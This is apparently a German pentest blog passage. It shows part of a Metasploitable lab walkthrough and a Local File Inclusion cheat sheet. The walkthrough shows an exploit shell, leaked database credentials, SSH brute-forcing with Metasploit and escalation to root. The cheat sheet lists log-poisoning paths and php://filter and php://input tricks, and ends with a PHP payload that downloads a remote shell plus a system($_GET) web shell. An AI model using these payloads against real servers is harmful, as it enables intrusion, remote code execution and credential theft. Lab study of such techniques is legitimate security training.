[*] TikiWiki database informations :

db_tiki   : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki  : tikiwiki195

[*] Attempting to execute our payload...
[*] Command shell session 2 opened ( -> at Wed Mar 16 09:02:39 -0400 2011

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Der gewählte Exploit gibt uns zusätzlich auch gleich den MySQL DB Login. Vielleicht können wir den später ja noch gebrauchen.

Wir können uns nun auf dem System ein wenig umsehen.

cat /etc/passwd

cat /etc/group

Wir sehen das der user msfadmin verschiedene Gruppenrechte hat und eventuell auch sudo Rechte verfügt. Deshalb versuchen wir den msfadmin account mit msf zu bruten.

ctrl + c und verwendet denn ssh login scanner um das Passwort für msfadmin zu bruten.

msf > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) >set pass_file /tmp/passwords.txt
msf auxiliary(ssh_login) >set username msfadmin
msf auxiliary(ssh_login) >set RHOSTS
msf auxiliary(ssh_login) >exploit

Der Bruter hat für den User msfadmin das Passwort msfadmin gefunden. Damit können wir uns nun über SSH als msfadmin verbinden.

root@bt:/pentest/exploits/framework3# ssh msfadmin@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': no
Host key verification failed.
root@bt:/pentest/exploits/framework3# ssh msfadmin@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
msfadmin@'s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
No mail.
Last login: Sat Mar 19 12:56:05 2011 from
msfadmin@metasploitable:~$ sudo -i
[sudo] password for msfadmin:
root@metasploitable:~# whoami
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

Klicke, um auf users_guide.pdf zuzugreifen

LFI – Local File Inclusion

Posted in PHP Injection on Januar 12, 2012 by peak

Dont forget the Nullbyte

/proc/self/environ -&gt; UserAgent (Use with UserAgentSwitcher)
/prov/version (OS Info)
/proc/self/cmdline   (Info gathering)
/proc/self/fd/0      (Info gathering, hexadezimal countable)

 Config File Include
look for:
Apache Access Log      e.g. /var/log/apache2/access.log
Apache Error Log       e.g. /var/log/apache2/error.log
Apache Config          e.g. /etc/apache2/apache2.conf
telnet http://www.target.net 80

override the exif data and include the jpeg file!

send mail
to apache@vic.net -&gt; /var/spool/mail/apache or /var/log/maillog
(Check isntalled Mailserver installation config for that Path)

SSH Log Files
sqli in username -&gt; /var/log/authlog (you can also check local config file beside www e.g. /etc/ssh/sshd_config)

or FTP?
try to login with sql commands and include /var/log/proftpd/proftpd.log




Read PHP Source
vuln.php?page=php://filter/convert.base64-encode/resource=FileNameToRead (allow_url_include, sprich RFI geht auch)

vuln.php?page=php://input Post: *PHPCode* (also works with Restricted by allow_url_include)

… und was injecten?
<?php $z=fopen('cgi.php','w');fwrite($z,file_get_contents('http://url/to/your/shell.txt'));fclose($z); ?>
<?php system($_GET['x']); ?>